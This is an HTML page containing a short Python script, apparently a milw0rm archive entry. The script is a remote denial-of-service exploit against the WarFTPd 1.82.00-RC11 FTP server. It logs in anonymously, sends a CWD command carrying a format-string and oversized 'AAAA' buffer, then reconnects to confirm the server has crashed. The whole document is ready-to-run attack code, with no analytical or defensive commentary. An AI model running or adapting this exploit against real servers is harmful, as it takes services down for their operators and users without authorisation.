<html><head><title>WarFTPd 1.82.00-RC11 Remote Denial of Service Exploit</title></head><pre>#!/usr/bin/env python

import sys
import ftplib

print &quot;WAR_FTPD Remote Denial Of Service (DOS)&quot;
print &quot;Copyright (c) Joxean Koret&quot;
print

target = &quot;192.168.1.13&quot;
targetPort = &quot;21&quot;

try:
    ftp = ftplib.FTP()

    print &quot;[+] Connecting to target &quot;
    msg = ftp.connect(target, targetPort)
    print &quot;[+] Ok. Target banner&quot;
    print msg
    print
    print &quot;[+] Trying to logging anonymously&quot;
    msg = ftp.login() # Anonymous
    print &quot;[+] Ok. Message&quot;
    print msg
    print
except:
    print &quot;[!] Exploit doesn't work. &quot; + str(sys.exc_info()[1])
    sys.exit(0)

a = &quot;%s%s&quot;
&quot;&quot;&quot;
for i in range(0):
    a += a
&quot;&quot;&quot;
b = &quot;AAAA&quot;

for i in range(6):
    b += b

a = a + b

print &quot;[+] Exploiting with a buffer of &quot; + str(len(a)) + &quot; byte(s) ... &quot;

try:
    ftp.cwd(a)
except:
    print &quot;[+] Exploit apparently works. Trying to verify it ... &quot;

    try:
        ftp.connect(target, targetPort)
        print &quot;[!] No, it doesn't work [&quot; + str(sys.exc_info()[1]) + &quot;] :(&quot;
    except:
        print &quot;[!] Ok. Server is dead, exploit successfully executed. &quot;

# milw0rm.com [2006-11-07]</pre></html>